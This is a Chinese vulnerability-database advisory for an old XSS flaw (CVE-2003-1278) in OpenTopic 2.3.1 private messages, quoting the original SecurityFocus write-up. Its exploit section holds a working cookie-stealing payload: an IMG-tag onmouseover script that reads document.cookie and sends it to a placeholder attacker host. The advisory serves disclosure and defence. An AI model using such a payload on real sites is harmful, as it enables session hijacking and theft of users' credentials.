OpenTopic私人消息HTML注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1107153 漏洞类型 跨站脚本
发布时间 2003-01-06 更新时间 2006-01-20
CVE编号 CVE-2003-1278 CNNVD-ID CNNVD-200312-144
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/22125
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-144
|漏洞详情
OpenTopic2.3.1版本存在跨站脚本(XSS)漏洞。远程攻击者像其他用户一样借助通过注入任意HTML或者脚本进入IMG标签的cookies执行任意脚本和可能偷窃认证信息。
|漏洞EXP
source: http://www.securityfocus.com/bid/6523/info

A HTML injection vulnerability has been reported for OpenTopic. The vulnerability exists because OpenTopic does not sufficiently sanitize HTML code from private message posts.

When a victim user views any private messages, any malicious HTML code will be executed in the web browser in the security context of the site.

Exploitation may allow for theft of cookie-based authentication credentials or other attacks. 

[IMG]http://[website]/img.gif"width="750"height="750"onmouseover="
a=document['coo'+'kie'];location='http://[attacker]/?'+a;[/IMG]
|参考资料

来源:BID
名称:6523
链接:http://www.securityfocus.com/bid/6523
来源:BUGTRAQ
名称:20030104OpenTopicsecurityhole
链接:http://www.securityfocus.com/archive/1/305232
来源:XF
名称:opentopic-img-xss(10985)
链接:http://www.iss.net/security_center/static/10985.php